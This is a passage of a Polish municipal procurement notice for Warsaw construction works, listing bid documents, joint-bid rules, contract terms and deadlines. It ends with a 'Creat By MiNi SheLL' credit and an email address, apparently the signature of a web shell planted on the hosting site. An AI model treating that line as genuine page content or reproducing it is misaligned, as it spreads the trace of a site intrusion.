1 osobą przewidzianą do pełnienia funkcji kierownika robót, posiadającą uprawnienia budowlane do kierowania robotami w specjalności konstrukcyjno-budowlanej, posiadającą zaświadczenie, wydane przez właściwą Izbę Samorządu Zawodowego, potwierdzające wpis danej osoby na listę członków właściwej izby. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw do wykluczenia:<br/>a)	oświadczenie potwierdzające aktualność informacji zawartych w oświadczeniu, o którym mowa Rozdz. 16 pkt 2 SWZ w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego – wg wzoru stanowiącego załącznik nr 6 do SWZ.<br/>Dokument/-y należy złożyć w formie elektronicznej (tj. w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem elektronicznym osobistym przez osobę upoważnioną do reprezentowania odpowiednio Wykonawcy, Wykonawcy wspólnie ubiegającego się o udzielenie zamówienia i/lub podmiotu udostępniającego zasoby.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania warunku zdolności technicznej i zawodowej:<br/>a)	wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.<br/>Wykaz winien zawierać m.in. rodzaj i wartość wykonanych robót, daty, miejsca wykonania i podmioty, na rzecz których roboty te zostały wykonane (wg wzoru stanowiącego załącznik nr 7 do SWZ). <br/>Dokument należy złożyć w formie elektronicznej (tj. w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem elektronicznym osobistym przez osobę upoważnioną do reprezentowania Wykonawcy.<br/>Do powyższego wykazu powinny być dołączone dowody określające czy te roboty budowlane zostały wykonane należycie, w szczególności informacje o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane (np.: protokół odbioru m.in. potwierdzający brak usterek, a w przypadku wykazu usterek należy przedstawić także dokument potwierdzający ich usunięcie), a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty.<br/>Dokument/-y należy złożyć w jednej z poniższych postaci:<br/>•	dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym, podpisem elektronicznym osobistym lub podpisem zaufanym przez osobę upoważnioną do reprezentowania podmiotu, na rzecz którego roboty budowlane były wykonane – w przypadku gdy dokument został sporządzony w postaci elektronicznej,<br/>•	cyfrowego odwzorowania tego dokumentu sporządzonego w postaci papierowej poświadczonego kwalifikowanym podpisem elektronicznym, podpisem elektronicznym osobistym lub podpisem zaufanym. Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej, dokonuje odpowiednio Wykonawca, Wykonawca wspólnie ubiegający się o udzielenie zamówienia, podmiot udostępniający zasoby, które każdego z nich dotyczą. Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej może dokonać również notariusz.<br/><br/>b)	wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług i kierowanie robotami budowlanymi.<br/>Wykaz winien zawierać m.in. informacje na temat kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia wskazanych osób, a także zakresu wykonywanych przez nie czynności wraz z informacją o podstawie do dysponowania tymi osobami - wg wzoru stanowiącego załącznik nr 8 do SWZ.<br/>Dokument należy złożyć w formie elektronicznej (tj. w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem elektronicznym osobistym przez osobę upoważnioną do reprezentowania Wykonawcy.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Wypełniony Formularz oferty - wg wzoru stanowiącego załącznik nr 1 do SWZ.<br/>Należy dołączyć go na platformie https://zamowienia.um.warszawa.pl jako osobny plik, w formie elektronicznej (tj. w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym przez osobę upoważnioną do reprezentowania odpowiednio Wykonawcę / Wykonawców wspólnie ubiegającego się o udzielenie zamówienia.<br/>2.	Oświadczenie Wykonawcy potwierdzające brak podstaw do wykluczenia z postępowania na podstawie przesłanek określonych w art. 108 ust. 1 ustawy Pzp i art. 7 ust 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (t.j. Dz.U. z 2023 r., poz. 1497 ze zm.) (wzór druku - załącznik nr 2 do SWZ).<br/>W przypadku podmiotów występujących wspólnie oświadczenie składa każdy Wykonawca. W przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, Wykonawca wraz z oświadczeniem, o którym mowa powyżej, składa także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu.<br/>3.	Oświadczenie Wykonawcy potwierdzające spełnianie warunków udziału w postepowaniu, określonych w Rozdz.15 pkt 3 SWZ (wzór druku - załącznik nr 3 do SWZ). <br/>W przypadku podmiotów występujących wspólnie oświadczenie składa każdy z Wykonawców, w zakresie w jakim wykazuje spełnienie warunków udziału w postępowaniu. W przypadku polegania na zdolnościach podmiotów udostępniających zasoby, Wykonawca składa także oświadczenie podmiotu udostępniającego zasoby, potwierdzające spełnianie warunków udziału w postępowaniu, w zakresie w jakim Wykonawca powołuje się na jego zasoby.<br/>4.	W przypadku gdy Wykonawca polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby składa wraz z ofertą zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów (wzór druku - załącznik nr 4 do SWZ). <br/>Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa powyżej, musi potwierdzać, że stosunek łączący Wykonawcę z podmiotami udostępniającymi zasoby, gwarantuje rzeczywisty dostęp do tych zasobów oraz określać w szczególności: <br/>	zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby; <br/> sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia; <br/>	czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane, których wskazane zdolności dotyczą.<br/>5.	Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia (o ile dotyczy) składane na podstawie art. 117 ust. 4 ustawy Pzp - (wzór druku - załącznik nr 5 do SWZ)<br/>6.	Pełnomocnictwo (o ile dotyczy tj. w przypadku, gdy oferta jest składana przez podmioty występujące wspólnie lub gdy oferta została podpisana przez inną osobę niż umocowana w dokumencie rejestrowym Wykonawcy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Zamawiający dopuszcza możliwość składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia w ramach oferty wspólnej w rozumieniu art. 58 ustawy Pzp.<br/>2.	Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie należytego jej zabezpieczenia.<br/>3.	Wykonawcy występujący wspólnie są zobowiązani do ustanowienia Pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego. <br/>4.	Pełnomocnictwo określające jego zakres i podpisane przez osoby wystawiające pełnomocnictwo uprawnione do reprezentacji Wykonawcy, należy złożyć wraz z ofertą.<br/>5.	Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie z Pełnomocnikiem, którego adres należy wpisać w formularz oferty.<br/>6.	Dokumenty składające się na ofertę powinny być podpisane przez Pełnomocnika lub wszystkich Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający zastrzega sobie możliwość zmiany warunków umowy na etapie jej realizacji w przypadkach określonych w §15 wzoru umowy stanowiącego załącznik nr 9 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-04-26 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zamowienia.um.warszawa.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-04-26 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-05-25</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> I. Uwaga dotycząca sposobu oceny ofert:<br/>W pkt 4.3.5.) Kryterium 1 - Cena oznacza Cenę brutto dla zadania podstawowego (gwarantowanego).<br/><br/>II. Termin realizacji :<br/>1.	Umowa obowiązuje od dnia podpisania umowy. Wprowadzenie na budowę nastąpi w terminie do 7 dni roboczych od daty zawarcia umowy.<br/>2.	Termin wykonania przedmiotu umowy w ramach zamówienia podstawowego (gwarantowanego) ustala się:<br/>1)	wykonanie projektu tymczasowej organizacji ruchu zatwierdzonej przez Biuro Zarządzania Ruchem Drogowym do 10 tygodni od dnia zawarcia umowy,<br/>2)	wykonanie robót budowlanych do 18 tygodni od dnia zawarcia umowy.<br/>3.	Termin wykonania przedmiotu umowy w ramach zamówienia opcjonalnego ustala się do 20 tygodni od dnia zawarcia umowy.<br/>4.	Datą wykonania przedmiotu umowy jest data zgłoszenia przez Wykonawcę gotowości do odbioru robót (§ 9 ust. 5 umowy), o ile Zamawiający dokona odbioru przedmiotu umowy na podstawie tego zgłoszenia.

Creat By MiNi SheLL
Email: jattceo@gmail.com